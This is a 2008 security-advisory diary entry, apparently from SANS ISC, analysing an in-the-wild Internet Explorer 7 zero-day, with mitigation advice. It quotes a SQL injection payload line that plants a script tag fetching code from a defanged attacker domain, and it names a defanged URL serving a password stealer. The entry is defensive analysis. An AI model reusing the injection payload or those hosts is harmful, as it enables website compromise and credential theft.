0-day exploit for Internet Explorer in the wild

Published: 2008-12-10
Last Updated: 2008-12-11 09:50:54 UTC
by Bojan Zdrnja (Version: 3)
2 comment(s)


Here are couple of updates regarding the latest 0-day.
As noted in Microsoft's advisory, Windows Server 2008 and Vista (both SP0 and SP1) are affected as well. The exploit for Windows Vista is publicly available now as well, but most malicious web sites still use the exploit I analyzed yesterday, so they are attacking only Windows XP and Windows 2003 machines.

It also appears that more attackers are now using this – we received log files showing that attackers using SQL injection are now. The SQL Injection attacks are similar to those we've described multiple times before (see http://isc.sans.org/diary.html?storyid=4565, for example). The important part includes the target URL that is injected:

rtrim(convert(varchar(4000),['+@C+']))+''<script src=http://17gamo [dot] com/1.js></script>''')FETCH NEXT FROM

This domain is not listed by Shadowserver yet. The 1.js script on the domain links to multiple other HTML documents of which one is called ie7.htm. You guessed it, it contains the latest 0-day exploit for Internet Explorer.

If executed successfully, the script will download the binary from http://www [dot] steoo [dot] com/admin/win.exe. This is a game password stealer which has sporadic detection (http://www.virustotal.com/analisis/244ae03fed5b32d999c50b614fddde6a) – there are some big names still missing it.

In any case, the attackers are picking this quickly so make sure that you are following recommendations from Microsoft's advisory which will help reduce exposure or, if you can, use an alternative browser until this has been fixed.



Update: Microsoft published a bulletin regarding this issue. See www.microsoft.com/technet/security/advisory/961051.mspx . In addition, shadowserver.org published a list of infected sites. Note that this list may not be complete. The best mitigating action from the bulletin is probably to enable DEP for Internet Explorer 7.[JBU]


As reported by some other researchers, there is a 0-day exploit for Internet Explorer circulating in the wild. At this point in time it does not appear to be wildly used, but as the code is publicly available we can expect that this will happen very soon.

This is a brand new exploit that is *not* patched with MS08-073 that was released yesterday. I can confirm that the exploit works in a fully patched Windows XP machine.

The exploit is a typical heap overflow that appears to be exploiting something in the XML parser. After setting up the heap (spraying it – allocating 159 arrays containing the shell code) the exploit checks if couple of things are satisfied before continuing:

  • The user has to be running Internet Explorer
  • The version of Internet Explorer has to be 7
  • The operating system has to be Windows XP or Windows 2003

If these things are satisfied, the exploit creates an XML tag as shown above. What is also interesting, and can be seen in the code above is that it waits 6 seconds before executing the code – this was probably added to thwart automatic crawlers by anti-virus vendors.

We have not confirmed yet if other versions are affected (Internet Explorer 6 or Internet Explorer 7 on Microsoft Windows Vista).

How to mitigate? This is a difficult question as we have not analyzed this completely yet. If you use an alternative browser you are not affected. When we get more information we will update the diary.


2 comment(s)


Just a little reminder to those that use IE7 daily; please remember to upgrade / patch your \"backup browser\" before you start using it! ;)
For those of you that use Websense at the enterprise level, I suggest adding the list of domains and harness it to protect your network.

Diary Archives